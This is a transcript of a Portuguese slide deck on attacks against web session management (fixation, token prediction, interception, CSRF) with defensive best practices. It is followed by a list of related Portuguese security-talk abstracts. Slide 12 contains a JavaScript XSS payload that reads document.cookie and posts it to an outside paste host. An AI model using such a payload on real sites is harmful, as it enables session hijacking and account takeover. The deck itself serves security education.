Attacking Session Management
|
|
|
- Octavio Alencastre Damásio
- 10 Há anos
- Visualizações:
Transcrição
1 Attacking Session Management Alexandre Villas (alequimico) Janeiro de 2012
2 SUMÁRIO 1. Introdução 2. Classes de ataques ao gerenciamento de sessão 1. Session Fixation 2. Predição 3. Interceptação 4. Força Bruta 3. Conclusão
3 INTRODUÇÃO Devido ao papel chave desempenhado pelo mecanismo de gerenciamento de sessão, este é um dos principais alvos de ataques contra a aplicação. Se um atacante quebra o gerenciamento de sessão da aplicação, então ele pode efetivamente "bypassar" o sistema de autenticação se personificar um usuário válido da aplicação sem sequer conhecer suas credenciais. Se um atacante compromete a conta do administrador, então o atacante pode "ownar" a aplicação inteira.
4 SESSION FIXATION ATTACK /login.jsp?sessionid=1234 online.worldbank.dom
5 BOAS PRÁTICAS... Certifique-se de que seu servidor não aceite tokens sugeridos pelo usuário. Evite XSS a todo custo. Troque o identificador de sessão após logar o usuário.
6 MITO COMUM Nós usamos smartcards para autenticação e as sessões dos usuários não podem ser comprometidas sem o uso deste dispositivo!
7 PREDIÇÃO - FRAQUEZAS NA GERAÇÃO DO TOKEN DE SESSÃO TOKENS SIGNIFICATIVOS
8 PREDIÇÃO - FRAQUEZAS NA GERAÇÃO DO TOKEN DE SESSÃO TOKENS NÃO SIGNIFICATIVOS
9 BOAS PRÁTICAS... Evite usar informações sensíveis dos usuários para compor o token. Busque geradores de tokens já consagrados pelo mercado.
10 INTERCEPTAÇÃO Capturando tokens
11 INTERCEPTAÇÃO Capturando tokens 1 O não uso do HTTPS. 2 Uso do HTTPS apenas no login. 3 Buracos no HTTPS durante o uso da aplicação. 4 HTTPS não forçado 5 A não mudança do token depois da autenticação. 6 Transmissão do token via GET 7 Não invalidação do token após logout/timeout
12 INTERCEPTAÇÃO Uso do XSS para Session Hijacking function a(){ var xhr = new XMLHttpRequest(); var params = 'paste_code=' + document.cookie + '&paste_name=xss_poc'; xhr.open("post"," xhr.setrequestheader("content-type","application/x-www-form-urlencoded"); xhr.setrequestheader("content-length",params.length + ""); xhr.setrequestheader("connection","close"); xhr.send(params); } a(); VIDEO
13 XSRF ou CSRF online.worldbank.dom Request Response with request to target <img src= >
14 BOAS PRÁTICAS... Usem o HTTPS e assegurem que este seja forçado e usado em toda a aplicação. Mudem o toquem após a autenticação. Nunca transmitam o token pelo método GET. Busquem que o timeout da sessão seja o mais curto possível e que este seja realmente invalidado com o logout ou no tempo. Utilize as flags SECURE e HTTPOnly nos tokens.
15 CONCLUSÃO A maioria das vulnerabilidades e ataques a sessão do usuário é de maior responsabilidade do desenvolvedor da aplicação do que do usuário em si. Busquem desenvolver suas aplicações Web da forma mais segura possível não tendo a visão da segurança como um mal necessário e sim como valor agregado e como diferencial de mercado em relação ao atual contexto.
16 BIBLIOGRAFIA 1 - Dafydd Stuttard & Marcus Pinto - The Web Application Hacker s Handbook Discovering and Exploiting Security Flaws 2 - Mitja Kolšek - Session Fixation Vulnerability in Web-based Applications 3 - William Zeller and Edward W. Felten - Cross-Site Request Forgeries: Exploitation and Prevention 4 -
17 AGRADECIMENTOS Contato:
Segurança em aplicações Web. Exemplos e Casos Práticos em
Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header
Desenvolvimento e disponibilização de Conteúdos para a Internet
Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,
Segurança em Sistemas Web. Addson A. Costa
Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.
Quem tem medo de XSS? William Costa
Quem tem medo de XSS? William Costa Composição do XSS. Os XSS s normalmente são divididos em 3 categorias Reflected XSS Stored XSS DOM Based XSS Reflected XSS Quando o usuário envia uma requisição durante
XSS - CROSS-SITE SCRIPTING
Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente
(In)Segurança em Aplicações Web. Marcelo Mendes Marinho [email protected] Thiago Canozzo Lahr [email protected]
(In)Segurança em Aplicações Web Marcelo Mendes Marinho [email protected] Thiago Canozzo Lahr [email protected] Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades
Segurança em PHP. Exemplos e Casos Práticos
Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST 3º Ciclo de Apresentações. 17/Março/2005 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL
Boas Práticas de Desenvolvimento Seguro
Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO
Vulnerabilidades em Sistemas de Informação:
Vulnerabilidades em Sistemas de Informação: (Discussão e História) [email protected] 02/07/2014 1 Vírus Inicio dos anos 80: Primeira infecção do IBM PC Mas o sabia-se como desde os anos
Gerência de Segurança
Gerência de segurança envolve a proteção de dados sensíveis dos dispositivos de rede através do controle de acesso aos pontos onde tais informações se localizam Benefícios do processo de gerência de segurança
VULNERABILIDADES WEB v.2.2
VULNERABILIDADES WEB v.2.2 $ whoami Sgt NILSON Sangy Computer Hacking Forensic Investigator Analista de Segurança da Informação Guerreiro Cibernético $ ls -l /etc 1. Contextualização 2. OWASP 2.1. Injeção
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas
Segurança no Plone. Fabiano Weimar dos Santos [Xiru] [email protected]
Segurança no Plone Fabiano Weimar dos Santos [Xiru] [email protected] Roteiro Um pouco sobre mim... Introdução Como Plone É tão Seguro? Modelo de Segurança OWASP Top 10 Segurança no Plone - Provedor PyTown.com
13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) [email protected]
13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) [email protected] Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro
Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo [email protected]
UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados [email protected] Sobre o professor Formação acadêmica: Bacharel
Para a prova de conceito utilizamos o kit de ferramentas do Backtrack 5 r3 (SET + ETTERCAP). Demostraremos a seguir o processo utilizado.
PROVA DE CONCEITO Para a prova de conceito utilizamos o kit de ferramentas do Backtrack 5 r3 (SET + ETTERCAP). Demostraremos a seguir o processo utilizado. 1) No Backtrack, executaremos a ferramenta SET.
Análise de Vulnerabilidades em Aplicações WEB
Análise de Vulnerabilidades em Aplicações WEB Apresentação Luiz Vieira Construtor 4Linux Analista e Consultor de Segurança 15 anos de experiência em TI Pen-Tester Articulista sobre Segurança de vários
Josh Pauli Revisão técnica Scott White. Novatec
Josh Pauli Revisão técnica Scott White Novatec Copyright 2013 Elsevier Inc. All rights reserved. No part of this publication may be reproduced or transmitted in any form or by any means, electronic or
Licenciamento Qlik Sense
Licenciamento Qlik Sense Antonio Mejia, Alexandre Zacarias Solution Architects Abril, 2015 Qlik Sense Product Editions Qlik Sense Desktop Sharing on Qlik Cloud Qlik Sense Qlik Sense Desktop Qlik Sense
O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.
Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)
Cross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo
Cross-Site Scripting Paulo Ricardo Lisboa de Almeida 1 Cross-Site Scripting - XSS Foco no ataque aos usuários finais O servidor não é diretamente afetado Dificuldade na detecção dos ataques Podem comprometer
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer [email protected]
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer [email protected] Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos
Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):
Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma
Segurança de transações contra dois tipos de ataque
Segurança de transações contra dois tipos de ataque Danton Nunes, InterNexo Ltda. [email protected] GTS 14 Motivação Recente discussão na lista GTS L sobre a questão de segurança de transações
Projeto Arquitetural do IEmbedded
Universidade Federal de Campina Grande Centro de Engenharia Elétrica e Informática Departamento de Sistemas e Computação Disciplina: Projeto I Professora: Francilene Garcia Equipe: Carolina Nogueira de
Indústria de Cartões de Pagamento (PCI) Padrão de segurança de dados. Resumo de Alterações da Versão 2.0 para a 3.0 do PCI-DSS
Indústria de Cartões de Pagamento (PCI) Padrão de segurança de dados Resumo de Alterações da Versão 2.0 para a 3.0 do PCI-DSS Novembro de 2013 Introdução Este documento fornece um resumo de alterações
3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança
3 SERVIÇOS IP 3.1 Serviços IP e alguns aspectos de segurança Os serviços IP's são suscetíveis a uma variedade de possíveis ataques, desde ataques passivos (como espionagem) até ataques ativos (como a impossibilidade
Daniel Caçador [email protected]
Daniel Caçador [email protected] Google Fixes Gmail Cross-site Request Forgery Vulnerability Netcraft, 30 Set 2007 Military Hackers hit US Defense office vnunet.com, 26 Abril, 2002 3 Factos : Grande
Segurança e privacidade na era da mobilidade: riscos e desafios. Aldo Albuquerque [email protected]
Segurança e privacidade na era da mobilidade: riscos e desafios Aldo Albuquerque [email protected] Aldo Albuquerque 20 anos de experiência na área de TI, 15 deles relacionados à segurança da informação
Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu
Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de
Políticas de segurança e informações
Whitepaper Políticas de segurança e informações VISÃO GERAL Este documento fornece uma visão de alto nível das políticas de segurança da New Relic, além de uma descrição geral dos recursos e das funcionalidades
Pen-test de Aplicações Web: Técnicas e Ferramentas
Divisão de Informática - DINF MJ Departamento de Polícia Federal Pen-test de Aplicações Web: Técnicas e Ferramentas Ivo de Carvalho Peixinho Perito Criminal Federal Agenda 1. Introdução 2. Ferramentas
Características: Switch Industrial Ethernet: Cisco Secure Agent: É isolado de todas as outras redes por um firewall ou por uma lista de acesso
O switch Industrial Ethernet Cisco Catalyst 2955 garante a confiabilidade o determinismo e a segurança fundamentais para uma rede de controle de produção. A confiabilidade é obtida evitando que PLCs e
Segurança Web com PHP 5
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer [email protected] Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos
UNIP UNIVERSIDADE PAULISTA
UNIP UNIVERSIDADE PAULISTA GERENCIAMENTO DE REDES Segurança Lógica e Física de Redes 2 Semestre de 2012 SEGURANÇA LÓGICA: Criptografia Firewall Protocolos Seguros IPSec SSL SEGURANÇA LÓGICA: Criptografia
Biblioteca de segurança para tratar as principais vulnerabilidades web
Biblioteca de segurança para tratar as principais vulnerabilidades web Tarcizio Vieira Neto DIOPE/COGSI/SISEC/SIDES Líder em soluções de TI para governo Apresentação pessoal Tarcizio Vieira Neto 4 anos
Migração do appliances Bluecoat 8000-10 para 9000-5 Ariel Cassins
Migração do appliances Bluecoat 8000-10 para 9000-5 Ariel Cassins Pós Graduação em Redes e Segurança de Sistemas Pontifícia Universidade Católica do Paraná Curitiba, novembro de 2010. Resumo O objetivo
Conviso Security Training Ementa dos Treinamentos
Escritório Central Rua Marechal Hermes 678 CJ 32 CEP 80530-230, Curitiba, PR T (41) 3095.3986 www.conviso.com.br Conviso Security Training Ementa dos Treinamentos Apresentação Sobre este Documento Este
Nessus Vulnerability Scanner
Faculdade de Tecnologia SENAC-RS Disciplina de Segurança em Redes Ferramentas de Segurança Nessus Vulnerability Scanner Nome: Rafael Victória Chevarria Novembro de 2013. 1. Introdução Nessus é um scanner
CAMADA DE TRANSPORTE
Curso Técnico de Redes de Computadores Disciplina de Fundamentos de Rede CAMADA DE TRANSPORTE Professora: Juliana Cristina de Andrade E-mail: [email protected] Site: www.julianacristina.com
JSF - Controle de Acesso FERNANDO FREITAS COSTA
JSF - Controle de Acesso FERNANDO FREITAS COSTA ESPECIALISTA EM GESTÃO E DOCÊNCIA UNIVERSITÁRIA JSF Controle de Acesso Antes de iniciarmos este assunto, é importante conhecermos a definição de autenticação
GUIA DE CONFIGURAÇÃO AUTENTICAÇÃO DE REDES WIFI COM CAPTIVE PORTAL
GUIA DE CONFIGURAÇÃO AUTENTICAÇÃO DE REDES WIFI COM CAPTIVE PORTAL GUIA DE CONFIGURAÇÃO AUTENTICAÇÃO DE REDES WIFI COM CAPTIVE PORTAL Captive Portal é um programa de computador responsável por controlar
O que é uma sessão. maneira de preservar dados através de acessos subsequentes.
Sessões em PHP O que é uma sessão Suporte a sessões no PHP: maneira de preservar dados através de acessos subsequentes. Características: permite a criação de aplicações mais personalizadas; permite que
SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA
SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA APLICAÇÕES DESKTOP VERSUS WEB Quais são as diferenças do ponto de vista da segurança APLICAÇÕES DESKTOP VERSUS WEB Em uma aplicação desktop,
segurança em aplicações web
segurança em aplicações web myke hamada mykesh gmail 1 whoami ciência da computação segurança da informação ruby rails c# vbscript opensource microsoft ethical hacking 2 agenda introdução ontem e
Segurança na Rede Local Redes de Computadores
Ciência da Computação Segurança na Rede Local Redes de Computadores Disciplina de Desenvolvimento de Sotware para Web Professor: Danilo Vido Leonardo Siqueira 20130474 São Paulo 2011 Sumário 1.Introdução...3
FICHA DE ESPECIFICAÇÃO TÉCNICA PRODUTO PROCESSO DATA: 01/11/2013. PRODUTO: IcBox SUB-PRODUTO: DESCRIÇÃO: Diagnósticos através de um sniffer serial
PRODUTO PROCESSO DATA: 01/11/2013 PRODUTO: IcBox SUB-PRODUTO: DESCRIÇÃO: Diagnósticos através de um sniffer serial ELABORAÇÃO: Wagner ÁREA: PDI 1. Introdução Durante o processo de desenvolvimento de um
GUIA PRÁTICO DE INSTALAÇÃO
GUIA PRÁTICO DE INSTALAÇÃO 1 1. PROCEDIMENTOS ANTES DA INSTALAÇÃO SIGEP WEB - Gerenciador de Postagens dos Correios 1.1. Solicitar Senha para Fechamento de PLP Solicitar ao seu consultor comercial a senha
ACESSO REMOTO EM NUVEM Guia Rápido
ACESSO REMOTO EM NUVEM Guia Rápido 1 - Conecte o HVR/DVR na alimentação; 2 - Conecte o equipamento a um monitor ou TV, pela saída VGA ou HDMI, para operação do sistema; 3 - Ao entrar no sistema do equipamento,
FACULDADE DE TÉCNOLOGIA SENAC SEGURANÇA DA INFORMAÇÃO
FACULDADE DE TÉCNOLOGIA SENAC SEGURANÇA DA INFORMAÇÃO Serviços IP Ícaro Evaristo; Igor Henrique; Jesus Cardoso; Wender Antônio. Prof. Dinailton da Silva Goiânia, Junho 2014. FACULDADE DE TÉCNOLOGIA SENAC
Análise de segurança em aplicativos bancários na plataforma Android RAFAEL J. CRUZ,
Análise de segurança em aplicativos bancários na plataforma Android RAFAEL J. CRUZ, DIEGO F. ARANHA Introdução As inovações tecnológicas afetam diretamente a forma como as organizações atuam sendo que,
10 maiores riscos em aplicações Web
10 maiores riscos em aplicações Web Leandro Silva dos Santos Thiago Stuckert [email protected] [email protected] Novembro - 2010 1 Open Web Application Security Project (OWASP) Organização
SEGURANÇA EM PROTOCOLO SIP
SEGURANÇA EM PROTOCOLO SIP Jeremias Neves da Silva 1 RESUMO Este artigo traz uma forma simplificada para a compreensão de todos os que desejam conhecer um pouco mais sobre segurança em protocolos SIP,
Manual de Configuração Wireless. Etec Alberto Santos Dumont. Guarujá
Manual de Configuração Wireless Etec Alberto Santos Dumont Guarujá Versão: 1.1 22 de março de 2012 Conteúdo 1 Objetivo... 3 2 Procedimentos... 3 2.1 Considerações iniciais... 3 2.1.1 Pré-Requisitos...
Políticas de Segurança de Sistemas
Políticas de Segurança de Sistemas Profs. Hederson Velasco Ramos Henrique Jesus Quintino de Oliveira Estudo de Boletins de Segurança O que é um boletim de segurança? São notificações emitidas pelos fabricantes
SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS
SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS Unidade Curricular Segurança em Redes 6º Semestre Prof. Eduardo Maroñas Monks Prática Remota 1 Google Hacking Aluno: Paulo
Segurança de Sistemas
Faculdade de Tecnologia Senac Curso de Análise e Desenvolvimento de Sistemas Segurança de Sistemas Edécio Fernando Iepsen ([email protected]) Segurança em Desenvolvimento de Software Segurança do
Ambiente Virtual de Avaliações Utilizando Certificados Digitais. Fernando Gevard Acadêmico Paulo Fernando da Silva - Orientador
Ambiente Virtual de Avaliações Utilizando Certificados Digitais Fernando Gevard Acadêmico Paulo Fernando da Silva - Orientador Roteiro Introdução Objetivos do trabalho Fundamentação teórica Avaliações
FTP Protocolo de Transferência de Arquivos
FTP Protocolo de Transferência de Arquivos IFSC UNIDADE DE SÃO JOSÉ CURSO TÉCNICO SUBSEQUENTE DE TELECOMUNICAÇÕES! Prof. Tomás Grimm FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para
Política de Uso do JEMS para a CAFe
Política de Uso do JEMS para a CAFe Julho de 2013 Conteúdo 1. Apresentação... 3 2. Definições... 3 3. Público Alvo... 3 4. Credenciamento... 3 5. Requisitos... 4 6. Termo de Uso... 4 7. Considerações Finais...
REDES DE COMPUTADORES E TELECOMUNICAÇÕES MÓDULO 16
REDES DE COMPUTADORES E TELECOMUNICAÇÕES MÓDULO 16 Índice 1. SISTEMA OPERACIONAL DE REDE...3 1.1 O protocolo FTP... 3 1.2 Telnet... 4 1.3 SMTP... 4 1.4 SNMP... 5 2 1. SISTEMA OPERACIONAL DE REDE O sistema
Inicialização Rápida do Novell Vibe Mobile
Inicialização Rápida do Novell Vibe Mobile Março de 2015 Introdução O acesso móvel ao site do Novell Vibe pode ser desativado por seu administrador do Vibe. Se não conseguir acessar a interface móvel do
Segurança em PHP. Edgar Rodrigues Sandi @EdgarSandi [email protected]. @EdgarSandi
Segurança em PHP Edgar Rodrigues Sandi [email protected] Gerente de projetos Desenvolvedor PHP e Java Ministra os treinamentos: Linguagens de Programação PHP I Fundamentos ( Oficial Zend ) PHP II Estruturas
Hackers. Seus dados podem ser inúteis, mas seu computador em si pode ainda ser um recurso valioso.
Firewalls Hackers Gostam de alvos fáceis. Podem não estar interessados nas suas informações. Podem invadir seu computador apenas por diversão. Para treinar um ataque a uma máquina relativamente segura.
Ataques a Aplicações Web
Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa http://www.carlosnilton.com.br/ [email protected] @cnacorrea Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL
FTP - Protocolo. O protocolo FTP é o serviço padrão da Internet para a transferência de arquivos entre computadores.
FTP FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para a transferência de arquivos entre computadores. A partir do FTP usuários podem receber ou enviar arquivos de ou para outros computadores
Aplicativos Android têm sérias vulnerabilidades SSL, dizem pesquisadores
Aplicativos Android têm sérias vulnerabilidades SSL, dizem pesquisadores Uma equipe de pesquisadores de duas universidades alemãs lançou um estudo afirmando que muitos dos aplicativos gratuitos mais populares
PROJETO INTEGRADOR. 5º PERÍODO Gestão da Tecnologia da Informação Noturno
FACULDADE DE TECNOLOGIA SENAC GOIÁS PROJETO INTEGRADOR 5º PERÍODO Gestão da Tecnologia da Informação Noturno GOIÂNIA 2014-1 Sistemas de Gestão Empresarial Alunos: Alessandro Santos André de Deus Bruno
Manual Email marketing v.240215
1º Passo Acessar a página www.marketing.vardigital.com.br e fazer login com os seguintes dados: Usuário: email@dominio Senha: var@emkt 2º Passo A página seguinte é o painel geral de administração, sendo
Web Application Firewall
Web Application Firewall SonicWALL Secure Remote Access Appliances Junho 2012 Edilson Cantadore Dell SonicWALL Brasil +55-11-7200-5833 [email protected] Aplicações Web Cada vez mais objetos de
Nova Prestech.net. Gerenciamento de Segurança da Informação com Software Livre. Consultoria e Soluções em Informática. http://www.prestech.com.
Consultoria e Soluções em Informática Gerenciamento de Segurança da Informação com Software Livre http://www.prestech.com.br Victor Batista da Silva Santos [email protected] +55 21 8762-6977 +55 21
Firewall. Alunos: Hélio Cândido Andersson Sales
Firewall Alunos: Hélio Cândido Andersson Sales O que é Firewall? Firewall pode ser definido como uma barreira de proteção, que controla o tráfego de dados entre seu computador e a Internet (ou entre a
Verificação em duas etapas. <Nome> <Instituição> <e-mail>
Verificação em duas etapas Agenda Senhas Verificação em duas etapas Principais tipos e cuidados a serem tomados Outros cuidados Créditos Senhas (1/4) Servem para autenticar
Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza
Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões Prof. MSc. Hugo Souza Se você precisar manter informações sobre seus usuários enquanto eles navegam pelo seu site, ou até quando eles saem
Descrição da atividade: elaborar um relatório sobre Prova de Conceito de ataque Man in the Middle (MITM) através do transbordamento da tabela MAC.
Tecnologia de Redes - Marissol Descrição da atividade: elaborar um relatório sobre Prova de Conceito de ataque Man in the Middle (MITM) através do transbordamento da tabela MAC. Definições e Conceitos
Auditoria e Segurança da Informação GSI536. Prof. Rodrigo Sanches Miani FACOM/UFU
Auditoria e Segurança da Informação GSI536 Prof. Rodrigo Sanches Miani FACOM/UFU Tópicos Motivação Utilização cada vez maior da Internet e a criação de ambientes cooperativos, levam a uma crescente preocupação
Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda
Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda Segurança na rede Segurança na rede refere-se a qualquer atividade planejada para proteger sua rede. Especificamente
